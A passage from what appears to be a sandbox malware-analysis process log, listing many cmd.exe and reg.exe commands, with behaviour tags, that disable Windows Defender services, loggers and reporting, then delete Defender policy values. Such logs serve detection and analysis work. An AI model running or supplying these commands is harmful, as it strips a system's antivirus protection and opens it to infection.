    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:3824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:3848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:3880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:2156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:3856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:1676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:2860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:1944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:3688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:3992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    PID:3864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:3936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2688
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:3888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:580
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:3896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:4020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:3596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:3020
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:660
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:3976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:2748
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:2876
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:2420
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:624
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:1140
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    PID:4088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    - Modifies registry key
    PID:4040
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:1960
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:4080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:960
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:2476
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1564
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:2884
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:3256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:2452
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:3304
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:1860
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:3152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    PID:3364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:3400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:864
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:3544
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:3500
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:1620
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:1364
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:3796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1556
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:2204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:2712
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1640
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:1852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:3800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    PID:3808
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:2780
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    PID:3816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:616
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:584
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:1144
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:2872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3092
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:3836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:3112
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    PID:2280
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:3136
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:3156
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:2532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:3188
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:3208
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:3260
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:3284
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:3308
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:3788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:3336
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:3852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:3864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\reg.exe
